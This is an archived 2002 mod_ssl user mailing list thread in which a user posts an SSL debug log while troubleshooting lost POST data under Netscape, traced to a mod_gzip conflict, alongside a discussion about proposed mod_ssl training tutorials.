[20/Feb/2002 12:13:18 -423811] [info] Connection to child 0 established (server localhost:443, client 127.0.0.1) [20/Feb/2002 12:13:18 -423811] [info] Seeding PRNG with 0 bytes of entropy [20/Feb/2002 12:13:18 -423811] [trace] OpenSSL: Handshake: start [20/Feb/2002 12:13:18 -423811] [trace] OpenSSL: Loop: before/accept initialization [20/Feb/2002 12:13:18 -423811] [debug] OpenSSL: read 11/11 bytes from BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 80 2b 01 03 00 00 12 00-00 00 10 .+......... | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:18 -423811] [debug] OpenSSL: read 34/34 bytes from BIO#007ACFB0 [mem: 053A16D3] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 02 00 80 04 00 80 00 00-64 00 00 62 00 00 03 00 ........d..b.... | | 0010: 00 06 ae ee 23 68 16 7b-1d 53 86 a4 4c 1c da 37 ....#h.{.S..L..7 | | 0020: 14 60 .` | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:18 -423811] [trace] OpenSSL: Loop: SSLv3 read client hello A [20/Feb/2002 12:13:18 -423811] [trace] OpenSSL: Loop: SSLv3 write server hello A [20/Feb/2002 12:13:18 -423811] [trace] OpenSSL: Loop: SSLv3 write certificate A [20/Feb/2002 12:13:18 -423811] [trace] OpenSSL: Loop: SSLv3 write server done A [20/Feb/2002 12:13:18 -423811] [debug] OpenSSL: write 633/633 bytes to BIO#007ACFB0 [mem: 053AE6F0] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 16 03 00 00 2a 02 00 00-26 03 00 3c 73 d9 2e 1e ....*...&..c.d.........0. | | 0220: 06 09 2a 86 48 86 f7 0d-01 01 04 05 00 03 41 00 ..*.H.........A. | | 0230: 1d 92 a7 2f 9e a6 e8 c7-5b 30 59 cf e8 b8 f1 db .../....[0Y..... | | 0240: 49 58 65 2c 09 fa 95 e2-a5 2a 17 e6 8c 72 fd b5 IXe,.....*...r.. | | 0250: 03 06 55 ee 99 be 66 be-cc 1d 56 a0 69 a7 6a 3d ..U...f...V.i.j= | | 0260: 87 95 2d 97 9e cc 37 91-f1 43 c1 dc 19 d2 b6 83 ..-...7..C...... | | 0270: 16 03 00 00 04 0e ...... | | 0279 - +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:18 -423811] [trace] OpenSSL: Loop: SSLv3 flush data [20/Feb/2002 12:13:18 -423811] [debug] OpenSSL: read 5/5 bytes from BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 16 03 00 00 44 ....D | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:18 -423811] [debug] OpenSSL: read 68/68 bytes from BIO#007ACFB0 [mem: 053A16CD] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 10 00 00 40 7c d0 4b 7f-c7 3a 70 b6 ed f3 55 9b ...@|.K..:p...U. | | 0010: 8a 51 71 cd 43 b8 42 44-0c 96 7d 3a 67 69 34 b5 .Qq.C.BD..}:gi4. | | 0020: 01 b9 d4 3a 66 d6 d5 2e-b2 99 f0 8f 27 16 9e 03 ...:f.......'... | | 0030: fa 5e 49 60 37 d2 91 f8-d9 33 f5 3b b5 6f ec 03 .^I`7....3.;.o.. | | 0040: e2 6d 7a 13 .mz. | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:19 -423811] [trace] OpenSSL: Loop: SSLv3 read client key exchange A [20/Feb/2002 12:13:19 -423811] [debug] OpenSSL: read 5/5 bytes from BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 14 03 00 00 01 ..... | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:19 -423811] [debug] OpenSSL: read 1/1 bytes from BIO#007ACFB0 [mem: 053A16CD] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 01 . | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:19 -423811] [debug] OpenSSL: read 5/5 bytes from BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 16 03 00 00 38 ....8 | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:19 -423811] [debug] OpenSSL: read 56/56 bytes from BIO#007ACFB0 [mem: 053A16CD] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 51 62 5a b2 4a 9d a5 9c-de ea ca 38 08 f3 27 e0 QbZ.J......8..'. | | 0010: 5e 44 5e c0 cd 95 98 91-8d e3 64 07 6b 26 06 98 ^D^.......d.k&.. | | 0020: e5 f6 f9 d9 56 80 62 fc-73 db d9 2c 48 dd 3e 79 ....V.b.s..,H.>y | | 0030: 5f 84 12 f4 e8 33 0e c3- _....3.. | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:19 -423811] [trace] OpenSSL: Loop: SSLv3 read finished A [20/Feb/2002 12:13:19 -423811] [trace] OpenSSL: Loop: SSLv3 write change cipher spec A [20/Feb/2002 12:13:19 -423811] [trace] OpenSSL: Loop: SSLv3 write finished A [20/Feb/2002 12:13:19 -423811] [debug] OpenSSL: write 67/67 bytes to BIO#007ACFB0 [mem: 053AE6F0] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 14 03 00 00 01 01 16 03-00 00 38 5c 40 23 59 8f ..........8\@#Y. | | 0010: a9 80 5f af d7 d6 cd f3-f3 8e c7 a9 71 55 06 25 .._.........qU.% | | 0020: aa 54 9b 88 08 71 6e 48-c8 3b 4b b5 c1 ac ec 95 .T...qnH.;K..... | | 0030: c4 a8 93 a2 73 d6 88 ec-71 39 ea 71 f6 fe 81 10 ....s...q9.q.... | | 0040: 68 04 2c h., | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:19 -423811] [trace] OpenSSL: Loop: SSLv3 flush data [20/Feb/2002 12:13:19 -423811] [trace] OpenSSL: Handshake: done [20/Feb/2002 12:13:19 -423811] [info] Connection: Client IP: 127.0.0.1, Protocol: SSLv3, Cipher: EXP-RC4-MD5 (40/128 bits) [20/Feb/2002 12:13:20 -423811] [debug] OpenSSL: read 5/5 bytes from BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 17 03 00 01 72 ....r | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:20 -423811] [debug] OpenSSL: read 370/370 bytes from BIO#007ACFB0 [mem: 053A16CD] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: a8 d1 97 12 b3 38 e5 74-d4 81 47 ad e6 20 d2 83 .....8.t..G.. .. | | 0010: 68 5a af f4 79 38 c3 c4-fa 53 a1 26 95 87 31 c9 hZ..y8...S.&..1. | | 0020: a4 b8 5d d8 c3 d9 f0 94-f1 d4 95 0a b6 fd a6 99 ..]............. | | 0030: a2 2b b8 9b f4 d1 a8 6e-ad ea 57 61 b6 82 14 ae .+.....n..Wa.... | | 0040: 82 52 e8 b2 95 31 6c 82-48 ca 87 7b e4 a2 52 61 .R...1l.H..{..Ra | | 0050: 9b 0c 8c 40 41 1f a8 01-a7 b1 6c 43 ce e3 37 fa ...@A.....lC..7. | | 0060: 34 34 f4 3f d8 bb 82 d8-5b 35 0e 21 eb 6b 7e 7c 44.?....[5.!.k~| | | 0070: a6 5d 1b 2c 7f 87 61 e0-ee aa 34 c6 02 52 c1 df .].,..a...4..R.. | | 0080: b1 ea 01 a0 f4 9c 43 4b-86 84 5b df d5 e7 78 ca ......CK..[...x. | | 0090: 5a 4e b4 a8 75 29 89 0a-e2 9b 9a bd 14 97 5c e0 ZN..u)........\. | | 00a0: 8c 18 d8 e7 fc 3b a0 9d-1c c8 4c 64 67 92 64 92 .....;....Ldg.d. | | 00b0: 56 b3 32 00 56 a9 62 e3-75 ec 3c 2d 19 f6 c0 11 V.2.V.b.u.<-.... | | 00c0: df 7a 00 42 63 d7 15 ac-17 c3 e4 7c 0c 3b 9b ed .z.Bc......|.;.. | | 00d0: 75 9d 18 ec c3 ce d1 7f-30 1c c9 f6 4f 16 77 8a u.......0...O.w. | | 00e0: 0f e1 18 fc 89 f7 d5 31-cf f9 bf 6d c1 25 5c 08 .......1...m.%\. | | 00f0: 10 32 44 30 24 b6 60 d6-e3 d7 56 81 4c af 65 c1 .2D0$.`...V.L.e. | | 0100: 61 60 12 08 17 d0 3e 6f-ee bb a6 05 10 68 f4 bb a`....>o.....h.. | | 0110: c6 f2 e2 ef 48 8f ae 13-0a fb 33 67 20 b1 2a 71 ....H.....3g .*q | | 0120: 2d 83 80 31 6b 8e 72 58-fc 97 ed 10 ce 13 ab 22 -..1k.rX......." | | 0130: f1 78 d0 27 9c b7 2d cd-80 e3 bd 66 f4 6a 02 98 .x.'..-....f.j.. | | 0140: cf 1d c9 20 34 41 8c 28-d1 0e 8a e5 9f 70 06 7d ... 4A.(.....p.} | | 0150: e4 1e 59 94 76 d0 02 97-4a 84 fc 89 17 3a a2 d7 ..Y.v...J....:.. | | 0160: 4a 42 b1 2a ba 5c b7 cc-fa f2 ce 1d 56 60 7e 08 JB.*.\......V`~. | | 0170: 7a b3 z. | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:27 -423811] [debug] OpenSSL: read 5/5 bytes from BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 17 03 00 00 55 ....U | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:27 -423811] [debug] OpenSSL: read 85/85 bytes from BIO#007ACFB0 [mem: 053A16CD] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 38 8a 8b 75 1c b1 c4 cc-0b 19 1c df 8d 79 f7 6f 8..u.........y.o | | 0010: e8 2e ad e0 8b fd 14 65-ab 42 78 1a 9a 2b 70 13 .......e.Bx..+p. | | 0020: df 74 a2 71 b2 37 dc d7-1c 57 f1 57 33 e7 8f 34 .t.q.7...W.W3..4 | | 0030: 42 cd 18 80 7a 2c 49 ef-b1 90 6c 38 0d 2f 19 bf B...z,I...l8./.. | | 0040: ac a2 dd b3 ff ec e1 7e-47 b1 cb 88 62 f6 68 0d .......~G...b.h. | | 0050: dc 6c 29 30 92 .l)0. | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:28 -423811] [debug] OpenSSL: read 5/5 bytes from BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 17 03 00 00 11 ..... | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:28 -423811] [debug] OpenSSL: read 17/17 bytes from BIO#007ACFB0 [mem: 053A16CD] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 6c 75 f0 9d b0 7e c6 da-9f 1c bb 8d 34 bc 48 35 lu...~......4.H5 | | 0010: 85 . | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:28 -423811] [debug] OpenSSL: read 5/5 bytes from BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 17 03 00 00 11 ..... | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:28 -423811] [debug] OpenSSL: read 17/17 bytes from BIO#007ACFB0 [mem: 053A16CD] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: db 8a c4 47 00 ae 72 5d-6a f9 86 f8 c4 4d b9 ee ...G..r]j....M.. | | 0010: 8b . | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:28 -423811] [info] Initial (No.1) HTTPS request received for child 0 (server localhost:443) [20/Feb/2002 12:13:29 -423811] [debug] OpenSSL: write 605/605 bytes to BIO#007ACFB0 [mem: 053A9EDC] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 17 03 00 02 58 a2 eb 8c-27 78 2c 7b 2f 60 30 86 ....X...'x,{/`0. | | 0010: 97 6e a9 7c 99 d8 2a 07-0e 74 f8 c2 d6 75 bb d5 .n.|..*..t...u.. | | 0020: 27 7e d2 f0 ea 2e b2 db-05 54 bf 9f 7c 50 e8 7b '~.......T..|P.{ | | 0030: 0e cd b1 e3 72 e0 ff cc-ef 2a 00 66 41 61 1e ec ....r....*.fAa.. | | 0040: f8 ed c3 be 75 03 29 62-b3 c3 a2 8b 5e 75 06 62 ....u.)b....^u.b | | 0050: 42 9d 17 42 ca 42 3a e7-dd d2 18 c4 5b f6 bd 53 B..B.B:.....[..S | | 0060: 54 85 10 68 66 0a 96 9b-30 9a d2 8d c9 09 de 43 T..hf...0......C | | 0070: bf 68 20 a1 91 1c 90 97-34 83 1f aa e9 6a 14 da .h .....4....j.. | | 0080: d1 11 5d 97 42 a8 12 14-e4 3b df 63 74 d4 a3 52 ..].B....;.ct..R | | 0090: 09 e8 fe a0 ef 9a fb fc-f0 26 fd cc 4e a0 3c 4c .........&..N..... | | 01f0: f1 07 95 0b cb cb bd 41-40 60 14 24 06 1a 50 43 .......A@`.$..PC | | 0200: ee 8f ca 00 e0 5a a1 54-e3 3b 84 6f 0b 6a 58 2c .....Z.T.;.o.jX, | | 0210: 6f 1d 3d 6b 2b 4c 8d c8-bb 05 82 d3 bd f7 8c 92 o.=k+L.......... | | 0220: a8 6a 61 56 ce 66 37 ff-c8 2f 94 ef c2 2a 3a ff .jaV.f7../...*:. | | 0230: 4f 82 0f 61 ed 50 d0 9e-6e cb e1 68 92 64 f3 43 O..a.P..n..h.d.C | | 0240: 2f a0 a1 18 08 6b ad cd-b5 27 f6 a1 13 e2 dc c0 /....k...'...... | | 0250: c2 cb 02 ae a6 37 d3 5d-e6 a8 f1 38 87 .....7.]...8. | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:29 -423811] [debug] OpenSSL: write 23/23 bytes to BIO#007ACFB0 [mem: 053A9EDC] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 15 03 00 00 12 0a fc da-5b 1a 33 bc 0f cb cf df ........[.3..... | | 0010: 11 2a 0f 7a 1a 11 1f .*.z... | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:30 -423811] [trace] OpenSSL: Write: SSL negotiation finished successfully [20/Feb/2002 12:13:30 -423811] [info] Connection to child 0 closed with standard shutdown (server localhost:443, client 127.0.0.1) I searched the news groups but I did not find anything relevat to this problem. There is a problem with Nescape and renegotiation, but I do not think that this is my problem. Please let me know if there is any fix to this kind of problem. Thank you, Marian ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 25 23:17:42 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA01981; Mon, 25 Feb 2002 23:07:53 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from MAIL.pcs.com id XAA01706; Mon, 25 Feb 2002 23:04:20 +0100 (MET) Received: by mail with Internet Mail Service (5.5.2653.19) id <10YP4DT1>; Mon, 25 Feb 2002 15:18:42 -0600 Message-ID: From: "Woodraska, Robert J." To: "'modssl-users@modssl.org'" Subject: RE: CBT Series on mod_ssl needed? Date: Mon, 25 Feb 2002 15:18:38 -0600 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id XAB01779 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Woodraska, Robert J." X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Any documentation can always be used by some subset of the userbase. I think it's a good idea. -----Original Message----- From: Justin Clift [mailto:justin@postgresql.org] Sent: Sunday, February 24, 2002 4:30 AM To: Søren Neigaard Cc: modssl-users@modssl.org Subject: Re: CBT Series on mod_ssl needed? Hi Søren, Thanks for your feedback, it's really appreciated! New users are the ones whom I create these CBT's for. A lot of the time with things, it's learning the concepts enough to get it up-and-running quickly and well that's needed. Once someone knows the general concepts and have it running, they can get the rest of the knowledge they need through reading the documentation and other materials. That's what I've found so far anyway. :) You're the only person who's answered my question though, so I'm guessing this isn't really a popular viewpoint with the majority of the mod_ssl people. :( Hope I'm wrong and after the weekend is over I get a few more email. :-) Regards and best wishes, Justin Clift So, that's one person saying yes Søren Neigaard wrote: > > Saturday, February 23, 2002, 6:20:11 PM, Justin wrote: > > JC> Hi everyone, > > JC> Just wondering if there would be a use if I started creating a free > JC> series of Computer Based Training tutorials for mod_ssl, similar to the > JC> series I've started for PostgreSQL : > > JC> http://techdocs.postgresql.org/college/ > > JC> These are Flash based animations (about 200k) which explain some of the > JC> basic concepts of PostgreSQL. So far, the feedback about them is really > JC> positive and I'm looking at other Open Source projects which would > JC> benefit (as well as continuing the PostgreSQL series). > > I'm new to mod_ssl and SSL in general, and I would say YES please, > that would be really nice :) > > What do you think those tutorials would cover? I have been reading the > documentation, but for me it isn't easy at all. The documentation > covers all the configuration of mod_ssl, but I really don't know what > happens when I start my mod_ssl-Apache server, or even if there is > more than one way to start it. Also I don't know how I add > users/passwords to a server or VirtualHost, so that only those users > has access. > > I don't know if this is too basic, or what you had in mind, but the > idea sounds GREATH to a newbie like me :) And I also know that if I > ask these really basic questions here, I upset a lot of people, so I > have my fingers crossed for a nice tutorial :) > > -- > Med venlig hilsen/Best regards, > Søren Neigaard mailto:neigaard@e-box.dk > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org -- "My grandfather once told me that there are two kinds of people: those who work and those who take the credit. He told me to try to be in the first group; there was less competition there." - Indira Gandhi ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org This email message is for the sole use of the intended recipients and may contain privileged and confidential information. Any unauthorized review, use, disclosure or distribution is prohibited. If you are not the intended recipient, please contact the sender by reply email and destroy all copies of the original message. Although this email and any attachments are believed to be free of any virus or other defect which might affect any system into which it is received or opened, it is the responsibility of the recipient to ensure that it is free from virus. This firm accepts no responsibility for any loss or damage arising in any way from its use. Thank you. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 25 23:29:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA03873; Mon, 25 Feb 2002 23:27:17 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from mail.espgroup.net id XAA03653; Mon, 25 Feb 2002 23:25:26 +0100 (MET) Received: from no.name.available by mail.espgroup.net via smtpd (for opensource-01.ee.ethz.ch [129.132.7.153]) with SMTP; 25 Feb 2002 22:17:41 UT Received: (private information removed) Received: from [63.66.134.226] by brickwall.espgroup.net via smtpd (for [10.3.1.2]) with SMTP; 25 Feb 2002 22:17:38 UT Message-ID: <3C7ABA65.1090308@espgroup.net> Date: Mon, 25 Feb 2002 17:27:49 -0500 From: "Dwayne Miller" User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.8) Gecko/20020204 X-Accept-Language: en,pdf MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: POST request data does not get through with Netscape References: <3C7A59BE.2090804@01com.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Dwayne Miller" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Interesting. I have seen the exact behavior with a custom module when running with mod_ssl enabled Apache2.0. I wrote it off as a problem with the custom module (although it seems to work fine when SSL is disabled). I still trying to understand the ins and outs of writing a module, but if I find something... I'll let you know. Marian wrote: > Hi! > > I found out that this problem was caused by an incompatibility between > mod_gzip and mod_ssl. I do not know the solution yet, but I am still > searching. > > Thank you, > Marian > > Hi! > > I have the following problem: > > I am running Apache 1.3.22 with mod_ssl 2.8.5 and openssl 0.9.6b on a > Windows 98 platform. I have a simple page on the server wich looks as > follows: > > file : test.php > ================================================= > > > Sample of HTML Form Submission > Hi . >
>

Your name: >

>

> > ================================================= > > When I am trying to submit this page using Netscape 4.61 the POST data > seems to get lost. > I tried to create a log with the data that is passed through mod_ssl, > but unfortunately the data is encripted and I do not know if the POST > data is acctually received. > The SSL log looks as follows: > > [20/Feb/2002 12:12:42 -267647] [info] Init: Loading certificate & > private key of SSL-aware server localhost:443 > [20/Feb/2002 12:12:42 -267647] [trace] Init: (localhost:443) > unencrypted RSA private key - pass phrase not required > [20/Feb/2002 12:12:43 -267647] [info] Init: Configuring server > localhost:443 for SSL protocol > [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) Creating > new SSL context (protocols: SSLv2, SSLv3, TLSv1) > [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) > Configuring permitted SSL ciphers > [ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL] > [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) > Configuring RSA server certificate > [20/Feb/2002 12:12:43 -267647] [warn] Init: (localhost:443) RSA > server certificate CommonName (CN) `01com' does NOT match server name!? > [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) > Configuring RSA server private key > [20/Feb/2002 12:12:43 -267647] [info] Init: Configuring server > localhost:443 for SSL protocol > [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) Creating > new SSL context (protocols: SSLv2, SSLv3, TLSv1) > [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) > Configuring permitted SSL ciphers > [ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL] > [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) > Configuring RSA server certificate > [20/Feb/2002 12:12:43 -267647] [warn] Init: (localhost:443) RSA > server certificate CommonName (CN) `01com' does NOT match server name!? > [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) > Configuring RSA server private key > [20/Feb/2002 12:12:43 -423811] [info] Init: Loading certificate & > private key of SSL-aware server localhost:443 > [20/Feb/2002 12:12:43 -423811] [trace] Init: (localhost:443) > unencrypted RSA private key - pass phrase not required > [20/Feb/2002 12:12:44 -423811] [info] Init: Configuring server > localhost:443 for SSL protocol > [20/Feb/2002 12:12:44 -423811] [trace] Init: (localhost:443) Creating > new SSL context (protocols: SSLv2, SSLv3, TLSv1) > [20/Feb/2002 12:12:44 -423811] [trace] Init: (localhost:443) > Configuring permitted SSL ciphers > [ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL] > [20/Feb/2002 12:12:44 -423811] [trace] Init: (localhost:443) > Configuring RSA server certificate > [20/Feb/2002 12:12:44 -423811] [warn] Init: (localhost:443) RSA > server certificate CommonName (CN) `01com' does NOT match server name!? > [20/Feb/2002 12:12:44 -423811] [trace] Init: (localhost:443) > Configuring RSA server private key > [20/Feb/2002 12:13:18 -423811] [info] Connection to child 0 > established (server localhost:443, client 127.0.0.1) > [20/Feb/2002 12:13:18 -423811] [info] Seeding PRNG with 0 bytes of > entropy > [20/Feb/2002 12:13:18 -423811] [trace] OpenSSL: Handshake: start > [20/Feb/2002 12:13:18 -423811] [trace] OpenSSL: Loop: before/accept > initialization > [20/Feb/2002 12:13:18 -423811] [debug] OpenSSL: read 11/11 bytes from > BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) > +-------------------------------------------------------------------------+ > > | 0000: 80 2b 01 03 00 00 12 00-00 00 10 > .+......... | > +-------------------------------------------------------------------------+ > > [20/Feb/2002 12:13:18 -423811] [debug] OpenSSL: read 34/34 bytes from > BIO#007ACFB0 [mem: 053A16D3] (BIO dump follows) > +-------------------------------------------------------------------------+ > > | 0000: 02 00 80 04 00 80 00 00-64 00 00 62 00 00 03 00 > ........d..b.... | > | 0010: 00 06 ae ee 23 68 16 7b-1d 53 86 a4 4c 1c da 37 > ....#h.{.S..L..7 | > | 0020: 14 60 > .` | > +-------------------------------------------------------------------------+ > > [20/Feb/2002 12:13:18 -423811] [trace] OpenSSL: Loop: SSLv3 read > client hello A > [20/Feb/2002 12:13:18 -423811] [trace] OpenSSL: Loop: SSLv3 write > server hello A > [20/Feb/2002 12:13:18 -423811] [trace] OpenSSL: Loop: SSLv3 write > certificate A > [20/Feb/2002 12:13:18 -423811] [trace] OpenSSL: Loop: SSLv3 write > server done A > [20/Feb/2002 12:13:18 -423811] [debug] OpenSSL: write 633/633 bytes to > BIO#007ACFB0 [mem: 053AE6F0] (BIO dump follows) > +-------------------------------------------------------------------------+ > > | 0000: 16 03 00 00 2a 02 00 00-26 03 00 3c 73 d9 2e 1e > ....*...&.. | 0010: 80 d6 54 6d d0 cf 00 4e-64 a1 e7 ad b1 66 22 0e > ..Tm...Nd....f". | > | 0020: 3d 32 17 51 15 f8 b4 7d-20 6b 32 00 00 03 00 16 =2.Q...} > k2..... | > | 0030: 03 00 02 3c 0b 00 02 38-00 02 35 00 02 32 30 82 > ...<...8..5..20. | > | 0040: 02 2e 30 82 01 d8 02 01-00 30 0d 06 09 2a 86 48 > ..0......0...*.H | > | 0050: 86 f7 0d 01 01 04 05 00-30 81 a1 31 0b 30 09 06 > ........0..1.0.. | > | 0060: 03 55 04 06 13 02 43 41-31 10 30 0e 06 03 55 04 > .U....CA1.0...U. | > | 0070: 08 13 07 4f 6e 74 61 72-69 6f 31 14 30 12 06 03 > ...Ontario1.0... | > | 0080: 55 04 07 13 0b 4d 69 73-73 69 73 73 61 75 67 61 > U....Mississauga | > | 0090: 31 1b 30 19 06 03 55 04-0a 13 12 49 6d 20 49 6e 1.0...U....Im > In | > | 00a0: 54 6f 75 63 68 20 4e 65-74 77 6f 72 6b 31 1c 30 Touch > Network1.0 | > | 00b0: 1a 06 03 55 04 0b 13 13-49 6d 20 49 6e 54 6f 75 ...U....Im > InTou | > | 00c0: 63 68 20 43 75 73 74 6f-6d 65 72 31 0e 30 0c 06 ch > Customer1.0.. | > | 00d0: 03 55 04 03 13 05 30 31-63 6f 6d 31 1f 30 1d 06 > .U....01com1.0.. | > | 00e0: 09 2a 86 48 86 f7 0d 01-09 01 16 10 6d 61 72 69 > .*.H........mari | > | 00f0: 61 6e 40 30 31 63 6f 6d-2e 63 6f 6d 30 1e 17 0d > an@01com.com0... | > | 0100: 30 32 30 32 31 35 32 32-35 36 34 30 5a 17 0d 31 > 020215225640Z..1 | > | 0110: 32 30 32 31 33 32 32 35-36 34 30 5a 30 81 a1 31 > 20213225640Z0..1 | > | 0120: 0b 30 09 06 03 55 04 06-13 02 43 41 31 10 30 0e > .0...U....CA1.0. | > | 0130: 06 03 55 04 08 13 07 4f-6e 74 61 72 69 6f 31 14 > ..U....Ontario1. | > | 0140: 30 12 06 03 55 04 07 13-0b 4d 69 73 73 69 73 73 > 0...U....Mississ | > | 0150: 61 75 67 61 31 1b 30 19-06 03 55 04 0a 13 12 49 > auga1.0...U....I | > | 0160: 6d 20 49 6e 54 6f 75 63-68 20 4e 65 74 77 6f 72 m InTouch > Networ | > | 0170: 6b 31 1c 30 1a 06 03 55-04 0b 13 13 49 6d 20 49 > k1.0...U....Im I | > | 0180: 6e 54 6f 75 63 68 20 43-75 73 74 6f 6d 65 72 31 nTouch > Customer1 | > | 0190: 0e 30 0c 06 03 55 04 03-13 05 30 31 63 6f 6d 31 > .0...U....01com1 | > | 01a0: 1f 30 1d 06 09 2a 86 48-86 f7 0d 01 09 01 16 10 > .0...*.H........ | > | 01b0: 6d 61 72 69 61 6e 40 30-31 63 6f 6d 2e 63 6f 6d > marian@01com.com | > | 01c0: 30 5c 30 0d 06 09 2a 86-48 86 f7 0d 01 01 01 05 > 0\0...*.H....... | > | 01d0: 00 03 4b 00 30 48 02 41-00 a2 ca b5 70 b9 35 5b > ..K.0H.A....p.5[ | > | 01e0: 50 da aa cf 05 70 86 4a-ec af 7d 66 4f fb 7a 2b > P....p.J..}fO.z+ | > | 01f0: 6f 92 7b b0 64 a9 db 93-bb 31 cc 52 a5 64 5b bd > o.{.d....1.R.d[. | > | 0200: 65 de e4 2e 2e 32 51 15-0d d5 66 d7 c5 d7 40 7f > e....2Q...f...@. | > | 0210: c6 3e 63 d6 64 ab b4 9b-0f 02 03 01 00 01 30 0d > .>c.d.........0. | > | 0220: 06 09 2a 86 48 86 f7 0d-01 01 04 05 00 03 41 00 > ..*.H.........A. | > | 0230: 1d 92 a7 2f 9e a6 e8 c7-5b 30 59 cf e8 b8 f1 db > .../....[0Y..... | > | 0240: 49 58 65 2c 09 fa 95 e2-a5 2a 17 e6 8c 72 fd b5 > IXe,.....*...r.. | > | 0250: 03 06 55 ee 99 be 66 be-cc 1d 56 a0 69 a7 6a 3d > ..U...f...V.i.j= | > | 0260: 87 95 2d 97 9e cc 37 91-f1 43 c1 dc 19 d2 b6 83 > ..-...7..C...... | > | 0270: 16 03 00 00 04 0e > ...... | > | 0279 - > +-------------------------------------------------------------------------+ > > [20/Feb/2002 12:13:18 -423811] [trace] OpenSSL: Loop: SSLv3 flush data > [20/Feb/2002 12:13:18 -423811] [debug] OpenSSL: read 5/5 bytes from > BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) > +-------------------------------------------------------------------------+ > > | 0000: 16 03 00 00 44 > ....D | > +-------------------------------------------------------------------------+ > > [20/Feb/2002 12:13:18 -423811] [debug] OpenSSL: read 68/68 bytes from > BIO#007ACFB0 [mem: 053A16CD] (BIO dump follows) > +-------------------------------------------------------------------------+ > > | 0000: 10 00 00 40 7c d0 4b 7f-c7 3a 